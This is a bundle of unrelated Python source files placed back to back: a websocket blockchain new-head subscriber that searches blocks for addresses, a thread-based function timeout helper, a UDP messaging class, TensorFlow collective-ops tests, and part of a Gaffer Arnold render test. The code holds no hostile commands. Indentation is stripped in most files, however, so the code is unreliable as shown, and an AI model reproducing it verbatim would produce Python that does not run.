]
}
logger.printInfo(f"Subscribing to {NEW_HEADS_SUBSCRIPTION}")
logger.printInfo(f"Making request {payload} to {WS_ENDPOINT}")
await session.send(payload)
async for msg in session.websocket:
if msg.type == aiohttp.WSMsgType.TEXT:
if msg.data == 'close':
await session.close()
elif rpcConstants.PARAMS in msg.data:
addrSearcherThread = threading.Thread(target=utils.searchAddressesIntoBlock, args=(msg.data,), daemon=True)
addrSearcherThread.start()
elif msg.type == aiohttp.WSMsgType.ERROR:
break
|
__init__.py
|
import kthread
try:
import thread
except ImportError:
import _thread as thread
import time
name = "bombfuse"
class TimeoutError(KeyboardInterrupt):
def __init__(self, func = None):
self.func = func
super(TimeoutError, self).__init__()
def __str__(self):
if self.func is not None:
return "The function '{}' timed out".format(self.func.__name__)
else:
return "The function timed out"
def timeout(sec, func = None, *args, **kwargs):
"""Executes a function, raising an exception in the main thread after sec seconds have elapsed"""
def timeout_thread():
timed_out = False
try:
t0 = time.time()
while True:
t1 = time.time()
if t1 - t0 >= sec:
timed_out = True
break
time.sleep(0.2)
finally:
if timed_out:
thread.interrupt_main()
else:
thread.exit()
def timeout_block():
    y = None
    try:
        y = kthread.KThread(target=timeout_thread)
        y.daemon = True
        y.start()
        return func(*args, **kwargs)
    finally:
        # Always stop the fuse thread, even if func raised before finishing.
        while y is not None and y.is_alive():
            y.kill()
            y.join()
if sec is None or sec == 0:
if func is not None:
return func(*args, **kwargs)
else:
return None
try:
return timeout_block()
except KeyboardInterrupt:
    raise TimeoutError(func)
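# Hedged usage sketch: slow_task below is a hypothetical caller-side function;
# only timeout() and TimeoutError come from this module.
def _timeout_usage_sketch():
    def slow_task(n):
        time.sleep(n)
        return n
    try:
        return timeout(2, slow_task, 5)  # the fuse fires after ~2 seconds
    except TimeoutError as exc:
        return str(exc)                  # "The function 'slow_task' timed out"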
|
UdpComms.py
|
class UdpComms():
def __init__(self,udpIP,portTX,portRX,enableRX=False,suppressWarnings=True):
"""
Constructor
:param udpIP: Must be string e.g. "127.0.0.1"
:param portTX: integer number e.g. 8000. Port to transmit from, i.e. from Python to the other application
:param portRX: integer number e.g. 8001. Port to receive on, i.e. from the other application to Python
:param enableRX: When False you may only send from Python and not receive. If set to True a thread is created to enable receiving of data
:param suppressWarnings: Stop printing warnings if not connected to other application
"""
import socket
self.udpIP = udpIP
self.udpSendPort = portTX
self.udpRcvPort = portRX
self.enableRX = enableRX
self.suppressWarnings = suppressWarnings # when true warnings are suppressed
self.isDataReceived = False
self.dataRX = None
# Connect via UDP
self.udpSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # internet protocol, udp (DGRAM) socket
self.udpSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # allows the address/port to be reused immediately instead of it being stuck in the TIME_WAIT state waiting for late packets to arrive.
self.udpSock.bind((udpIP, portRX))
# Create Receiving thread if required
if enableRX:
import threading
self.rxThread = threading.Thread(target=self.ReadUdpThreadFunc, daemon=True)
self.rxThread.start()
def __del__(self):
self.CloseSocket()
def CloseSocket(self):
# Function to close socket
self.udpSock.close()
def SendData(self, strToSend):
# Use this function to send string to C#
self.udpSock.sendto(bytes(strToSend,'utf-8'), (self.udpIP, self.udpSendPort))
def ReceiveData(self):
"""
Should not be called by user
Function BLOCKS until data is returned from C#. It then attempts to convert it to a string and returns it on successful conversion.
A warning or error is raised if:
- Warning: Not connected to the C# application yet. The warning can be suppressed by setting suppressWarnings=True in the constructor
- Error: If the data receiving procedure or conversion to a string goes wrong
- Error: If the user attempts to use this without enabling RX
:return: returns None on failure or the received string on success
"""
if not self.enableRX: # if RX is not enabled, raise error
raise ValueError("Attempting to receive data without enabling this setting. Ensure this is enabled from the constructor")
data = None
try:
data, _ = self.udpSock.recvfrom(1024)
data = data.decode('utf-8')
except WindowsError as e:
if e.winerror == 10054: # An error occurs if you try to receive before connecting to other application
if not self.suppressWarnings:
print("Are You connected to the other application? Connect to it!")
else:
pass
else:
raise ValueError("Unexpected Error. Are you sure that the received data can be converted to a string")
return data
def ReadUdpThreadFunc(self): # Should be called from thread
"""
This function should be called from a thread [Done automatically via constructor]
(import threading -> e.g. udpReceiveThread = threading.Thread(target=self.ReadUdpNonBlocking, daemon=True))
This function loops over the BLOCKING ReceiveData call, storing the result in self.dataRX and setting the received flag whenever data arrives
This function runs in the background and updates class variables to read data later
"""
self.isDataReceived = False # Initially nothing received
while True:
data = self.ReceiveData() # Blocks (in thread) until data is returned (OR MAYBE UNTIL SOME TIMEOUT AS WELL)
self.dataRX = data # Populate AFTER new data is received
self.isDataReceived = True
# When it reaches here, data received is available
def ReadReceivedData(self):
"""
This is the function that should be used to read received data
Checks if data has been received SINCE LAST CALL; if so, it returns the received string and sets the flag to False (to avoid re-reading the same data)
data is None if nothing has been received
:return:
"""
data = None
if self.isDataReceived: # if data has been received
self.isDataReceived = False
data = self.dataRX
self.dataRX = None # Empty receive buffer
return data
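# Hedged usage sketch (ports and payload are illustrative, not prescribed by
# this module): transmit on 8000, receive on 8001, and poll ReadReceivedData()
# instead of blocking on ReceiveData().
if __name__ == "__main__":
    import time
    comms = UdpComms(udpIP="127.0.0.1", portTX=8000, portRX=8001, enableRX=True)
    comms.SendData("hello from Python")
    while True:
        incoming = comms.ReadReceivedData()  # None until the other application sends something
        if incoming is not None:
            print(incoming)
        time.sleep(0.1)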
|
collective_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.experimental.ops import testing as dataset_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
all_reduce = _collective_ops.all_reduce
all_gather = _collective_ops.all_gather
broadcast_send = _collective_ops.broadcast_send
broadcast_recv = _collective_ops.broadcast_recv
class CollectiveOpsV2(object):
@staticmethod
def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def broadcast_send(t, shape, dtype, group_size, group_key, instance_key,
*args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.broadcast_send_v2(t, group_size, group_key,
instance_key, *args, **kwargs)
@staticmethod
def broadcast_recv(shape, dtype, group_size, group_key, instance_key, *args,
**kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
shape = array_ops.identity(shape)
return _collective_ops.broadcast_recv_v2(
shape, dtype, group_size, group_key, instance_key, *args, **kwargs)
device_combination = (
combinations.combine(device='CPU', communication='RING', required_gpus=0) +
combinations.combine(
device='GPU', communication=['RING', 'NCCL'], required_gpus=2))
collective_op_combinations = combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce', CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather', CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination)
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v1', CollectiveOpsV1),
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
def testGather(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_gather_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_gather_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_gather_2devices():
self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)
def testBroadcast(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_broadcast_2devices():
shape = [3]
in_value = constant_op.constant([1., 2., 3.], shape=shape)
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.broadcast_send(
in_value,
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.broadcast_recv(
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
for result in run_broadcast_2devices():
self.assertAllClose(result, [1., 2., 3.], rtol=1e-5, atol=1e-5)
def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
dev2 = '/device:%s:2' % device
dev3 = '/device:%s:3' % device
@def_function.function
def run_all_reduce_4devices_same_instance_key():
# Use a common instance key for both groups.
instance_key = 0
# We will create 2 groups each with 2 devices.
group_size = 2
# Group 0 comprises dev0 and dev1.
group0_key = 0
# Group 1 comprises dev2 and dev3.
group1_key = 1
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(1.), group_size, group0_key, instance_key))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(2.), group_size, group0_key, instance_key))
with ops.device(dev2):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(3.), group_size, group1_key, instance_key))
with ops.device(dev3):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(4.), group_size, group1_key, instance_key))
return collectives
results = run_all_reduce_4devices_same_instance_key()
self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)
def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key=100,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with ops.device(dev0):
gathered_tensor = collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key=200,
communication_hint=communication)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testCollectiveInvalidKey(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
instance_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with self.assertRaisesRegex(
errors.InternalError, 'instance 100 expected type 0 and data_type 1 but'
' got type 2 and data_type 1'):
with ops.device(dev0):
collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def testMultipleGroups(self, collective_ops, device, communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [float(group_key) for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/{}:{}'.format(device, device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(
collective_ops.all_reduce(
input_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[float(group_key) * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@combinations.generate(collective_op_combinations)
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testAbortGroupParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
def testAbortInstanceParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
context._reset_context() # pylint: disable=protected-access
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def_function.function(collective_fn)()
def testAbortCommunication(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal collective to finish resolution.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Reset the context in order to reset the collective executor.
t.join()
_setup_context()
def_function.function(collective_fn)()
class OpCancellationTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortIfNoCollective(self, collective_op, device,
communication):
# Do not abort if there are no active collective ops. There could be
# exceptions like EOF which we expect users to catch; aborting collective
# ops on every op error would interfere with that workflow.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
dataset = dataset_ops.Dataset.from_tensors([1.])
@def_function.function
def collective_fn(in_tensor):
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def f():
iterator = iter(dataset)
collective_fn(next(iterator))
# This next(iterator) should raise EOF.
collective_fn(next(iterator))
with self.assertRaises(errors.OutOfRangeError):
f()
collective_fn(constant_op.constant([1.]))
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
],
mode='eager'), device_combination))
def testOpErrorAbortWithCollective(self, collective_op, device,
communication):
# Abort v1 collective ops if there are active collective ops at the time of
# an op error. Because v1 collective ops cannot be cancelled, op errors may
# otherwise cause running collective ops to hang.
dev0 = '/device:%s:0' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test abortion
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Now collective ops is aborted, subsequent collective ops should fail with
# the previous error.
with self.assertRaises(errors.CancelledError):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortWithCollective(self, collective_op, device,
communication):
# Do not abort v2 collective ops even if there are active collective ops at
# the time of an op error. We rely on cancellation to terminate active
# collective ops.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
@def_function.function
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Local params resolution cannot be cancelled yet, so we perform a normal
# collective so that the group is resolved.
collective_fn()
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test cancellation
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Collective ops shouldn't be aborted and new collectives should be able to
# proceed.
collective_fn()
@combinations.generate(collective_op_combinations)
class TimeoutTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testTimeout(self, collective_op, device, communication):
timeout = 1.5
@def_function.function
def run(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1., 2., 3., 4.]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/{}:{}'.format(device, i)):
input_data = constant_op.constant(tensor)
result = collective_op(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
results.append(result)
return results
run(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
def testParamResolutionAfterTimeout(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
# This timeout comes from param resolution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev1):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def testExecutionAfterTimeout(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# Run a normal all-reduce to complete param resolution.
run()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev1):
# No timeout.
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class OrderingTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testOrdering(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
with ops.device(dev0):
token0 = resource_variable_ops.ResourceVariable(0.)
with ops.device(dev1):
token1 = resource_variable_ops.ResourceVariable(0.)
@def_function.function
def f():
# Launch the first collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
# Launch the second collective without token.
with ops.device(dev0):
collective_op(in_tensor, group_size, group_key, instance_key)
with ops.device(dev1):
collective_op(in_tensor, group_size, group_key, instance_key)
# Launch the third collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
graph = f.get_concrete_function().graph
for device in [dev0, dev1]:
# Try to find the third collective, which should have the first collective
# as a control input.
third = None
for op in graph.get_operations():
if (op.type.startswith('Collective') and op.device.endswith(device) and
op.control_inputs and
op.control_inputs[0].type.startswith('Collective')):
self.assertIsNone(third)
third = op
self.assertIsNotNone(third)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in third.inputs))
first = third.control_inputs[0]
self.assertEqual(third.device, first.device)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in first.inputs))
self.assertEmpty(first.control_inputs)
def _setup_context():
context._reset_context()
test_util.set_logical_devices_to_at_least('CPU', 4)
context.ensure_initialized()
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
ArnoldRenderTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import inspect
import unittest
import subprocess32 as subprocess
import threading
import arnold
import imath
import IECore
import IECoreScene
import IECoreArnold
import Gaffer
import GafferTest
import GafferDispatch
import GafferImage
import GafferScene
import GafferSceneTest
import GafferArnold
import GafferArnoldTest
class ArnoldRenderTest( GafferSceneTest.SceneTestCase ) :
def setUp( self ) :
GafferSceneTest.SceneTestCase.setUp( self )
self.__scriptFileName = self.temporaryDirectory() + "/test.gfr"
def tearDown( self ) :
GafferSceneTest.SceneTestCase.tearDown( self )
GafferScene.deregisterAdaptor( "Test" )
def testExecute( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression( "parent['render']['fileName'] = '" + self.temporaryDirectory() + "/test.%d.ass' % int( context['frame'] )" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.failIf( p.returncode )
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%d.ass" % i ) )
def testWaitForImage( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Display(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["task"].execute()
